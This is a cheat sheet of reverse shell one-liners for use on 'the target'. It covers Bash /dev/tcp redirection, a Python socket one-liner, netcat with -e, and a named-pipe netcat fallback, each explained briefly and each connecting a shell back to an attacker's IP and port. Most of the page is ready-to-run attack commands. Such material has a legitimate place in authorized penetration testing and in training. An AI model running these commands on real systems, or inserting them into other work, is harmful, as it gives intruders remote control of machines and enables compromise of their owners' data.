
Cheatsheet: Reverse Shells

Bash

When we don't have any third-party tool on the target, Bash itself can open the connection. Bash builds with network redirections enabled (the default in Bash's own build configuration) treat /dev/tcp/<host>/<port> as a pseudo-path that connects a TCP socket. The command below starts an interactive shell, sends its stdout and stderr to that socket (>&) and reads its stdin from the same socket (0>&1). Note that /bin/sh on Debian-derived systems is dash, which has no /dev/tcp support, so the command must be run by bash explicitly.

bash -i >& /dev/tcp/[Your IP]/[Your Port] 0>&1

Python

On Linux we can also abuse an interpreter that ships with the operating system. The one-liner below makes Python open a TCP socket to our listener, duplicate it onto file descriptors 0, 1 and 2 with os.dup2, and then spawn /bin/sh -i, so the shell's input and output go straight over the socket. On current systems the interpreter is usually installed as python3 rather than python, so check with command -v first.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[Your IP]",[Your Port]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Netcat

If we cannot reach any interpreter, other programs can do the job, and netcat is one of them. Netcat builds that support the -e flag (netcat-traditional, ncat, busybox nc) connect to the remote host and attach /bin/sh to the connection, so whatever our listener writes to the socket is executed by the shell.

nc -e /bin/sh [Your IP] [Your Port]

Old Netcat

If the above fails with an unrecognised -e option, the host's netcat was built without it (the OpenBSD netcat that Debian and Ubuntu ship by default, for example, or a netcat-traditional built without the -e option) rather than simply being old. The same effect can be had with a named pipe: nc writes what it receives from us into /tmp/f, cat feeds that to /bin/sh -i, and the shell's output (stderr merged with 2>&1) is piped back into nc. This variant works on any netcat that can open a connection.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Your IP] [Your Port] >/tmp/f
